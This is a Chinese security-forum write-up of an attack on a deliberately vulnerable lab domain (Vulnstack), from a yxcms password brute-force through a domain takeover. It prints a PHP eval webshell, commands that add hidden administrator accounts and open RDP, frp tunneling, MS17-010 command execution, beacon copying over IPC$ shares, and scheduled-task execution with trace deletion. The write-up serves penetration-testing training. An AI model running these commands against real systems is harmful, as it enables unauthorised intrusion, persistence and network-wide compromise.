奇安信攻防社区-内网渗透初级篇-一次对简单的域环境渗透过程

内网渗透初级篇-一次对简单的域环境渗透过程

从信息收集，web网站一直到打入内网，控制主机的过程。使用到了密码爆破、一句话木马、通信隧道建立、漏洞利用等知识。适合刚开始学习内网的读者阅读。

一、环境搭建
======

环境简介：
-----

| 操作系统 | IP地址 |
|---|---|
| 攻击者 kali | IP地址：192.168.31.77 |
| 攻击者 Windows 10 | IP地址：192.168.31.83 |
| windows 7 | 外网地址：192.168.31.215 内网地址：192.168.52.143 |
| windows 2008 | IP地址：192.168.52.138 |
| windows 2003 | IP地址：192.168.52.141 |

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-8ae70b440d06451b2ba14b9d4bbb1412f8b1a734.png)

此次渗透学习利用了红日安全团队的域环境。非常好的学习环境，通过渗透该环境能够学习到很多知识。

下载地址：<http://vulnstack.qiyuanxuetang.net/vuln/detail/2/>

（一）win7 web服务器设置
----------------

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4934461d66eb0b84d0058643333d3c54d9bdde0d.png)

phpstudy中设置网站目录为 `C:/phpstudy/www/yxcms`, 点击应用。![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c866e766643897cd02f79896a1c6fc2db40c1305.png)

站点域名管理中网站目录设置为C:/phpstudy/www/yxcms

网站域名如下设置

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e563069b05978e958a98f01ce7f96eb49e622124.png)

hosts文件 如下设置

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a86c43e8ea2d467bafc20906664d11013eee5430.png)

（二）KALI设置
---------

在kali攻击机的 `/etc/hosts` 文件中 添加www.yxcms123.com的域名解析

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0eb8d8a3b8139b23ee8088d77e737811d307153a.png)

这样就通过浏览器，输入域名直接访问网站。而不是使用IP地址，是渗透环境更加真实。

二、渗透WEB服务器
==========

（一）信息收集
-------

设置完成后 浏览器输入 www.yxcms123.com 可以正常打开web页面

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-58f1d8da15b2dea2c891288ed7537d85c1fb2b37.png)

使用`nmap`对网站进行扫描

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5eb09e23ecd984062b35f9f90b8a9ffe9c9d9a6f.png)

yxcms系统的管理员登录页面通常为 `index.php?r=admin/index/login`

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0afec554a4e66689b3f3aa488d5d377910217e1.png)

尝试修改为 admin

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-598b6dbde4a18f36644eeaea4163c02ca1e42c06.png)

（二）爆破用户名密码
----------

利用BurpSuite对用户名和密码进行爆破

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e65202772b68f5c4baac79dd277b508b75399290.png)

设置字典文件

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fed22ef7925b9a06e71412900649378dd161c69f.png)

开始爆破，发现密码123456的返回值和其他的返回值长度明显不一样。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e35a0ef9fb5da8eb3e937cf8a88df4e746bd9e8c.png)

使用 admin/123456登录，登录成功。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c27ddf139077db2d2d2a1bd27c83fbb6bd8c27bb.png)

版本：YxcmsApp 1.2.1 【未授权】

（三）获得Shell
----------

登录成功后，尝试写入一句话木马。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9147e6b8f2c11f602d6faacc1e044abdd5acbad7.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-8f9220ad76ed4c1c2cec661121ac1b0997b4d58e.png)

写入 PHP的一句话木马

```php
<?php @eval($_POST['pass']);?>
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0392c66d9d85ecb4fbaee3d0665797cc32de4283.png)

使用菜刀或蚁剑连接都可以

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3879e2522a73f42cdb1f1e55ccd3dbde297be4d2.png)

获得了WEB服务器的Shell

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5089f6f71600c95ebd1a56e05f27dce0e327fa99.png)

（四）主机信息收集
---------

查看WEB服务器的网络地址

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-78629f7f9b5350513789313b4565ee0d1e384749.png)

查看当前用户

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b271b9315eb95722c14640a5a721b3e6eed6e8e7.png)

查看防火墙的配置信息

```php
netsh firewall  show config
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9195ed127b7b85960a68d8f941c60df6578c2203.png)

检查安装的杀毒软件

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d10c7f19798907d5df3385e1b8f651aeaa505fb7.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-346192c7219f2960de35242904533a120126630c.png)

发现没有安装杀毒软件。

（五）上线CS
-------

利用CS生成Payload

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-5cdb8cb7a7ffe1559c3583dc3cbb98608fc32f50.png)

复制生成的txt内容，利用菜刀或蚁剑的终端执行

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2df65a1c47706e4769fdfd682dbd78c36f6d2c82.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-50bbb3a507f8bff91063b0135f28ad89f28c4e89.png)

片刻， 可以看到已经上线

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6533bc9246601f78dfbcb8975b64120c60b5424f.png)

修改延迟时间，因为这里是靶机环境，为了学习用的，所以将时间直接设置为0

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-21bb8175f2357c3e0af4bb0e177301145056dcdb.png)

（六）内网信息收集
---------

使用大余师傅编写的插件上传nbtscan 并进行内网搜集，插件主要是为了方便，提高效率。没有的话手动上传也可以。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-86a9ad3aa2be58c31f9ec449d1a4a217793094b4.png)

扫描到内网的三个 ip地址

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b597ea76bd569e76bb34fe9de4ea4f63c4a6f0aa.png)

192.168.52.138是域控制器

关闭web服务器的防火墙（主机信息收集可以得知操作系统信息）

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-9ee9b0a5d10a6590fd5b7e8c4ab480a42438087d.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-889276b53c9708000f87e824ed32706e7942e85e.png)

查看web机器的密码

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b7582ab991e236f7f2af762725aadc235e59472c.png)

当前密码为p@ssw0rd

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e0fbd695074218ad87ec0a495663ab2d171001fd.png)

（七）创建新用户
--------

创建用户并加入组

```php
shell net user biu Pass!@#4 /add
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d69de4fc60cd7f22d51a841dbab75c9ab5395a16.png)

加入管理组

```php
shell net localgroup administrators biu /add
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-4388561e43cfad98642734c0f2a6f8c38fce1c07.png)

在实战中，创建新用户还是比较容易被发现的。

（八）拓展-开启远程桌面
------------

开启3389端口

win7 以上

设置远程桌面端口

```php
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
```

开启远程桌面

```php
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
```

检查端口状态

```php
netstat -an|find "3389"
```

关闭远程桌面

```php
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f459d5aca9569acc1b623dea9e304994a7cc2611.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-251eeb31ce8f2c5c240312d497518786fa127066.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-db1be836f4f5b51f70e44907ba2214bfc460cbe7.png)

防火墙 放行RDP（如需放行）

```php
shell  netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
```

在实战中不到万不得以最好不要登录远程桌面，非常容易被发现。

三、建立通信隧道
========

利用frp建立一条一级代理，使WEB服务器作为一个跳板，这样攻击者就可以直接访问到域内的其他主机了。

frp 客户端配置信息

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-32706cd2f528356bc1153f1abc3b0521fa59959a.png)

192.168.31.83 是frp服务端的的IP地址

服务器端的配置

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-be4a628006cf5d2d8ef6f55eaa4b0d9478cb020c.png)

将客户端 frpc.exe 及配置文件 frpc.ini上传到web靶机

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-84f9c0ccb971eafbfb7429cfc5c491327d32bcbc.png)

等待片刻 上传完成

**注意**：上传frp完成时一定要看一下文件的大小，有时候文件会上传的不完整导致程序无法执行。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-bf71bf8cd315d8170ccfc986e64bd80e32a2ea04.png)

在服务端（攻击机 Windows 10）开启监听

```php
frps.exe -c frps.ini
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c0a157d78b47ee9baf3329fdae9e43684aa3d300.png)

客户端运行 frpc.exe

```php
shell frpc.exe -c frpc.ini
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-23dcef6c1abf3f6e9f07bb825fac5b7f30f293c5.png)

在服务端可以看到 监听成功

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0c60f6258aa64a8034b50e931ec40223aaf9ea1d.png)

四、渗透域控制器
========

（一）利用M etasploit渗透域控
--------------------

msf设置代理

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a98319e90750dcd7eb4809eed9a0b5eda415dcdc.png)

搜索smb，使用第16个`smb/smb_version`

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-d9e8d1696a50ed1caa616db139b8c2d1f8e24da6.png)

使用`smb_version` 对192.168.52.143/24内网进行扫描，确认之前扫描到的信息

同样扫描到IP地址：143，138，141

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fa8a2eb2962de1b644050d8867c3cc06c6dd5025.png)

扫描的同时可看到代理服务器在走数据

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a68aff0a8ff8db87f732368100b73873cc4ceadc.png)

使用 ms17\_010\_command 提权（利用该模块可以在存在漏洞的主机上执行cmd命令）

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-3761203366833388c61f287edba17e61a581d6c3.png)

COMMAND即为要执行的cmd命令

RHOSTS为 目标主机的IP地址

默认 执行 `net group "Domain Admins" /domain`命令

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-97533efc3c1f6ac5a635b6481b3ca87dcd727f02.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-df8b9f39b80345ebd209ca429582efaae348830e.png)

尝试执行`ipconfig`命令

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-85eb41f5467d4e297f7318c1f510e0d45b61fb70.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-2562f19e5c46418c8320949fbe7b3c674563de01.png)

在目标机器上 创建用户，加入管理员组

```php
set command net user biu138 "p@ssw0rd" /add
run
set command net localgroup administrators biu138 /add
run
set command net user biu138
run
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-24396d09e91fc79674998e6f961a013d82ab803f.png)

（二）CS生成木马
---------

在CS中，设置中转监听。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-89352cdc856c5fb5de8acd1a8a93eec751ca66b2.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-c97389522f434051ea4280c9ca5eaf562b69bacc.png)

查看监听器

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a810d657bcded6bb05127e2cf3a99f32e181a02a.png)

生成木马

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-e7e928f9c339696709113dac8cf1ab0bed078648.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-85c5627c4c5349ece152b3adebd71b9e3feb28ac.png)

生成一个 beacon.exe， 现在需要将 beacon.exe上传到内网中

（三）上传木马到域控
----------

先用 CS将beacon.exe 上传到web服务器 52.143中

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-acd5804ed336b2ac37b3ab3ade054847ce7e33e2.png)

然后在 web服务器 执行cmd命令开启共享

```php
shell net use \\192.168.52.138\ipc$ p@ssw0rd /user:biu138
```

（biu138是 域用户，对141渗透时无需再执行 该命令）

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-6705845d06a5ae51a3941d3a7125a2ea9f6a17f3.png)

然后进入138主机的目录

```php
shell dir \\192.168.52.138\c$
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7bf77bf5bf7d1de8a2e6fa330ff7d7d608347595.png)

然后查看 138主机中运行的进程

```php
 shell tasklist /S 192.168.52.138 /U biu138 /P p@ssw0rd
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-7fbc6630970771158e1aea5dd9b5eb888622a73a.png)

使用平台 检测 主机是否存在杀软

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-42f0d1fc604d31c1c5fb0d03af08276bca60de21.png)

没有安装杀软

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-09a644ec08415d1349cca36774abe45e0793717d.png)

复制beacon.exe 到 52.138主机上

```php
shell copy C:\phpStudy\WWW\yxcms\beacon.exe \\192.168.52.138\c$
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f9bf193a69f93f4478286993d8fe7dc5f9263388.png)

上传木马到域控的方法还有很多，比如利用web服务器下载。这里先只介绍这么一种。

（四）执行木马上线CS
-----------

利用msf 执行 beacon.exe木马

```php
set command cmd /c "c:\beacon.exe" 
run
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-066fcf3ad52b64998a37c137b80e215160fe54c0.png)

可以看到138 已经通过中转上线

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-39138cd037be852bfc4afb23eaea1e5c0c965ad0.png)

进行提权获得一个 稳定的shell

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-66368b59b332055d30c743d414f88cfe3924c801.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-fa58428ab71020b9df926a4c2575cdefb680cc45.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-678959288e17c0bdf8a5191f44fa305497bdbb7f.png)

五、渗透内网主机
========

（一）上传木马
-------

利用同样的方法拿141主机

使用刚才渗透域控的木马，或者重新生成一个新的木马都可以。

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-b5675fa27bc8bee4e9de3358cece4bada12e200b.png)

上传到143主机

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-97b7ee0b3b556ad9dbcc04e8a8826872c739cde2.png)

复制beacon2.exe到 141主机上

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-ec6778116148036137ac653e545e005b8338ec3c.png)

（二）利用定时任务执行木马
-------------

查看 141主机当前的时间

```php
shell net time \\192.168.52.141
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-78f133ba236280a41cefb9ebb924731bf5df1350.png)

创建定时任务

```php
shell at \\192.168.52.141 16:39:00 C:\beacon2.exe
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-a8b2c27734bb37ada7e586dc6bba770b2d7b09d8.png)

清楚创建 定时任务的痕迹

```php
shell at \\192.168.52.141 <定时任务ID> /delete
```

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-f7810535c0a486c917512ab91ec93425a7524e8b.png)

成功上线

三台靶机全部上线，而且是最高权限

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-aa5fc99ebc3bcb9f0ed0d930e5cc24aef598078a.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-0683e2f9d60eb9979afa113df9caca67fa6899f3.png)

![img](https://shs3.b.qianxin.com/attack_forum/2021/12/attach-48b80c93685fb8f4a048b8bb7632ab4e49108534.png)

六、总结
====

这是初学域渗透时做的学习笔记，域环境相对来说比较简单，但是还是能够学习到很多的知识，在实战中也可以应用。首先利用BurpSuite爆破获得啦网站的密码，然后通过一句话木马获得shell并上传木马上线CS。建立通信隧道使得攻击者能够直接访问到域内的主机，使用传说中的永恒之蓝漏洞拿下了域控并上线CS。同样利用相同的方式将木马上传到内网用户，并利用定时任务执行，使之上线CS。通过该环境能学习到很多知识，攻击的方法还有好多，可以自行发掘。

发表于 2021-08-23 10:45:14
阅读 ( 6798 )
分类：内网渗透

3 条评论

0ne酱 2021-08-23 18:24

入口点WEB服务器，你不都已经抓到域管的明文了嘛。。。。。

飞神剑 2021-08-26 10:29

那是我设的，这个地方我没用

小何同学 2023-01-03 22:51

上线CS处没有上线是什么原因呢？